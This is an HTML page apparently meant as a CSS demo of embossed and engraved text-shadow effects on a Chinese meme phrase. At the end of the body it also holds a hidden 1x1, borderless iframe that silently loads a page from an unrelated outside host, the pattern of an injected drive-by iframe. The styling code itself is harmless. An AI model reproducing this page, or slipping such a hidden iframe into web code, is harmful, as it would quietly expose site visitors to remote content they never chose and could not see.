<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title></title>
    <style>
        body{
            background-color: #CCCCCC;
        }
        p{
            text-align: center;
            font-size:90px;
            font-family: "Microsoft Yahei";
            margin-top:50px;
            font-weight: bold;
            color:#ccc;
        }
        .tu{
            text-shadow:-1px -1px 1px #fff,1px 1px 1px #000;
        }
        .ao {
            text-shadow: -1px -1px 1px #000, 1px 1px 1px #fff;
        }
        /*.tu{*/
            /*text-shadow: -1px -1px 1px #fff, 1px 1px 1px #000;*/
        /*}*/

        /*.ao{*/
            /*text-shadow: -1px -1px 1px #000, 1px 1px 1px #fff;*/
        /*}*/
    </style>
</head>
<body>
    <p class="tu">总有刁民想朕</p>
    <p class="ao">总有刁民想朕</p>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>